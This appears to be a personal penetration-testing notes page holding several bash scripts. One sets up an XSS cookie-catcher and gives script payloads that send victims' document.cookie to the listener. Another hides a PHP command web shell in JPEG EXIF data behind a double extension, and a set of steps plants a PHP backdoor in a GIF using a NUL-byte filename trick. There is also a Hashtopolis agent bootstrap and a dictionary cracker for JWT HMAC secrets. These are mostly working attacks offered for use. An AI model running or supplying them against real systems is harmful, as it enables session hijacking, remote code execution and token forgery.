MySecurityPath
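#!/usr/bin/env bash
#
# Stand up a minimal "cookie catcher" for an XSS test: a PHP endpoint that
# appends whatever arrives in ?p= to log.txt. Inject one of these into the
# vulnerable page, with 1.1.1.1 replaced by this host:
#
# Sample1 (redirects the victim, very visible):
# <script type="text/javascript">
# document.location='http://1.1.1.1/index.php?p='+document.cookie;
# </script>
# Sample2 (background request, the victim stays on the page):
# <script type="text/javascript">
# var xGet = new XMLHttpRequest(); xGet.open("GET", 'http://1.1.1.1/index.php?p='+document.cookie, true); xGet.send(null);
# </script>
#
# Caveats:
# - The listener is unauthenticated: anyone who can reach port 80 can write to
#   the log. The log is kept OUTSIDE the served directory so it cannot simply
#   be downloaded as /log.txt. Run it only for the duration of the test and
#   delete log.txt afterwards - it holds live session cookies.
# - Cookies flagged HttpOnly are not readable via document.cookie.
# - Everything travels over plain HTTP; the captured cookies cross the network
#   in clear.
set -euo pipefail

sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get install -y php

# www/ is the document root; log.txt lives one level above it.
mkdir -p www

# Quoted delimiter: bash expands nothing inside, so the PHP is written verbatim
# (no need to escape every '$').
cat > www/index.php <<'EOL'
<?php
// Append the raw ?p= value to ../log.txt. A missing ?p= yields an empty line
// instead of an "undefined index" notice.
$param = $_GET['p'] ?? '';
$file = fopen(__DIR__ . '/../log.txt', 'a');
if ($file !== false) {
    fwrite($file, $param . "\n\n");
    fclose($file);
}
?>
EOL

# apache2 may hold port 80; ignore the failure when it is not installed/running.
sudo service apache2 stop || true

# Serve only www/, so the log is not reachable over HTTP.
sudo php -S 0.0.0.0:80 -t www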
  1. Get a GIF (image.gif).
  2. Get a PHP backdoor: `locate simple-backdoor.php && cp /usr/share/webshells/php/simple-backdoor.php .`
  3. Embed it in the GIF comment block: `gifsicle --comment "$(tr '\n' ' ' < simple-backdoor.php)" < image.gif > image_backdoor.phpA.gif`
  4. Confirm the script is inside the GIF (`strings image_backdoor.phpA.gif | head` should show the `<?php` tag; `file` should still report GIF image data).
  5. Upload with the proxy intercept ON. Find the filename in the request body in HEX and change the byte 41 ("A") to 00 (NUL), so the name becomes `image_backdoor.php\0.gif`: the upload filter still sees ".gif", while a server that truncates filenames at NUL (e.g. PHP before 5.3.4) stores and executes it as `image_backdoor.php`. This only works against targets that still mishandle NUL in filenames; modern stacks reject it.
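#!/usr/bin/env bash
#
# Bootstrap a Hashtopolis agent on a fresh Ubuntu box with the Intel OpenCL
# CPU runtime. Set HASTOPOLIS_IP in the environment or pass the server
# address as $1 (default 127.0.0.1). You still need a voucher from the server
# (http://${HASTOPOLIS_IP}/api/server.php) when the agent registers.
#
# Supply-chain caveats, not fixed here because the page provides no checksums:
# - agents.php?download=1 is fetched over plain HTTP and then executed
#   (python3 hashtopolis.zip). Anyone on the path can replace it. Use https://
#   where the server offers it, and compare the zip with a copy taken from the
#   server host before running it.
# - The Intel OpenCL tarball is also fetched over HTTP and its install.sh runs
#   as root. Verify it against Intel's published checksum before installing.
set -euo pipefail

HASTOPOLIS_IP="${1:-${HASTOPOLIS_IP:-127.0.0.1}}"

# Refresh the sudo credential cache up front (the original note did
# "sudo su" / "exit" for the same purpose).
sudo -v

sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get install -y python3-pip ocl-icd-libopencl1 ocl-icd-dev ocl-icd-opencl-dev
pip3 install requests psutil

mkdir -p hashtopolis
cd hashtopolis
# Quoted: '?' in the URL would otherwise be subject to filename globbing.
wget "http://${HASTOPOLIS_IP}/agents.php?download=1" -O hashtopolis.zip

mkdir -p intel
cd intel
wget http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/15532/l_opencl_p_18.1.0.015.tgz -O intel.tgz
tar zxf intel.tgz
# The tarball unpacks into a versioned directory (l_opencl_p_<version>),
# written as "l_open..." in the original note.
cd l_opencl_p_*/
sudo ./install.sh
# Back to hashtopolis/ (l_opencl_p_*/ -> intel/ -> hashtopolis/).
cd ../..

# Runs the agent; it asks for the server URL and the voucher on first start.
python3 hashtopolis.zip
#http://${HASTOPOLIS_IP}/api/server.php
#Voucher from server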

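#!/usr/bin/env bash
#
# Hide a PHP command shell in a JPEG's EXIF DocumentName so the file still
# passes "is it really an image?" checks (file(1), getimagesize) while a
# server that maps the ".php" in the name to the PHP handler executes it.
#
# Caveat: the shell is unauthenticated - anyone who finds the uploaded file
# can run commands as the web server user. Use it only in an authorised test
# and remove the file when done.
set -euo pipefail

# Requires exiftool:  sudo apt install libimage-exiftool-perl
# Start from a JPEG that already exists on the target site (image.jpg) so the
# upload blends in.

# __halt_compiler() stops PHP from parsing the binary image data that follows
# the tag. exiftool keeps a backup as image.jpg_original.
exiftool -DocumentName="<h1>Hello<br><?php if (isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" image.jpg

# Double extension: an upload filter that looks at the last extension sees
# ".jpg"; a server that hands any ".php" component to PHP (e.g. Apache with
# AddHandler for .php) executes it.
mv image.jpg dangerous.php.jpg
file dangerous.php.jpg                    # should still report JPEG image data
exiftool -DocumentName dangerous.php.jpg  # confirm the payload is in place

# After uploading, run commands with:
#   <uploaded path>/dangerous.php.jpg?cmd=whoami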
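#!/usr/bin/env bash
#
# gen_JWT.sh - dictionary attack on the HMAC secret of a JWT (HS256/HS384/HS512).
#
# Background (author's note): hashcat -a 3 -m 16500 '<token>' --force reported a
# different candidate ('sud') for the token below, while verifying each
# candidate with openssl's HMAC finds 'lol'. This script is much slower than
# hashcat (one openssl fork per candidate) but checks every candidate exactly.
#
# Usage:
#   ./gen_JWT.sh wordlist_1-4_azAZ09 &
#   ./gen_JWT.sh rockyou.txt &
# Progress and the result go to <wordlist>.log, e.g.:
#   18742/14344392
#   Found! lol
#   eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...
#
# Configuration: set "goal" to the token under attack. Header, payload and
# algorithm are taken from the token itself, so the signing input is exactly
# what the issuer signed (re-encoding the JSON by hand, as the first version
# did, breaks on any difference in whitespace or key order).
#
# Fixes relative to the first version: broken shebang ("# /bin/bash"),
# top-level "return 0" (not valid in an executed script, so the loop kept
# running and the progress write truncated the "Found!" lines), a last
# wordlist line without trailing newline being skipped, and the
# xxd/paste/sed pipeline replaced by portable od/tr.
set -euo pipefail

goal="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6BrtP-Y3A-vQXPY9jAh_d0E6L4IUjL65CvmEjgdTZyr2ag-TM-glH6EYKGgO3dBYbhblaPQsbeClcw"

#######################################
# base64url-encode a string without padding (JWT style).
# Arguments: $1 - raw string
# Outputs:   encoded string on stdout (no newline)
#######################################
b64url() {
  # tr -d '\n' undoes the line wrapping GNU base64 applies after 76 chars.
  printf '%s' "$1" | base64 | tr -d '\n' | tr '+/' '-_' | tr -d '='
}

#######################################
# Decode base64url (padding optional).
# Arguments: $1 - base64url string
# Outputs:   decoded bytes on stdout
#######################################
b64url_decode() {
  local s
  s=$(printf '%s' "$1" | tr '_-' '/+')
  # base64 -d wants the padding back.
  while (( ${#s} % 4 )); do s+='='; done
  printf '%s' "$s" | base64 -d
}

#######################################
# Print the openssl digest name for the token's "alg" header.
# Arguments: $1 - JWT (header.payload.signature)
# Outputs:   sha256 | sha384 | sha512
# Returns:   1 if alg is missing or not an HMAC-SHA variant
#######################################
jwt_alg() {
  local header
  local re='"alg"[[:space:]]*:[[:space:]]*"HS(256|384|512)"'
  header=$(b64url_decode "${1%%.*}")
  if [[ $header =~ $re ]]; then
    printf 'sha%s\n' "${BASH_REMATCH[1]}"
  else
    printf 'unsupported or missing alg in header: %s\n' "$header" >&2
    return 1
  fi
}

#######################################
# Compute the base64url JWT signature for a candidate secret.
# Arguments: $1 - digest (sha256/sha384/sha512)
#            $2 - candidate secret (non-empty)
#            $3 - signing input (header.payload)
# Outputs:   signature on stdout
# Returns:   openssl's status (non-zero on a key openssl rejects)
#######################################
hmac_sig() {
  local digest=$1 secret=$2 input=$3 hexkey
  # Hex key: any byte in the candidate survives option parsing unchanged.
  hexkey=$(printf '%s' "$secret" | od -An -tx1 -v | tr -d ' \n')
  printf '%s' "$input" \
    | openssl dgst "-${digest}" -mac HMAC -macopt "hexkey:${hexkey}" -binary \
    | base64 | tr -d '\n' | tr '+/' '-_' | tr -d '='
}

#######################################
# Try every line of a wordlist as the token's HMAC secret.
# Arguments: $1 - JWT
#            $2 - wordlist path (one candidate per line)
#            $3 - log file
# Outputs:   progress "tried/total" (rewritten every 1000 candidates) and,
#            on success, "Found! <secret>" plus the re-signed token, to $3
# Returns:   0 found, 1 not found, 2 unsupported alg
#######################################
crack_jwt() {
  local token=$1 wordlist=$2 log=$3
  local digest signing_input target total tried=0 candidate sig
  digest=$(jwt_alg "$token") || return 2
  signing_input=${token%.*}   # header.payload, as signed by the issuer
  target=${token##*.}         # signature to reproduce
  # wc counts newlines, so a final line without one is not in "total".
  total=$(wc -l < "$wordlist" | tr -d ' ')
  # "|| [[ -n ... ]]" keeps a last line that has no trailing newline.
  while IFS= read -r candidate || [[ -n $candidate ]]; do
    tried=$((tried + 1))
    if (( tried % 1000 == 0 )); then
      printf '%s/%s\n' "$tried" "$total" > "$log"
    fi
    # Empty candidates are skipped: openssl's hexkey: needs at least one byte.
    [[ -n $candidate ]] || continue
    sig=$(hmac_sig "$digest" "$candidate" "$signing_input") || continue
    if [[ $sig == "$target" ]]; then
      printf 'Found! %s\n%s.%s\n' "$candidate" "$signing_input" "$sig" >> "$log"
      return 0
    fi
  done < "$wordlist"
  printf 'Sorry not found password in %s\n' "$wordlist" >> "$log"
  return 1
}

#######################################
# Entry point: crack $goal with the wordlist given as $1, logging to $1.log.
#######################################
main() {
  local wordlist=$1
  if [[ ! -r $wordlist ]]; then
    printf 'cannot read wordlist: %s\n' "$wordlist" >&2
    return 2
  fi
  crack_jwt "$goal" "$wordlist" "${wordlist}.log"
}

if (( $# == 0 )); then
  printf 'usage: %s WORDLIST   (result is written to WORDLIST.log)\n' "${0##*/}" >&2
else
  main "$@"
fi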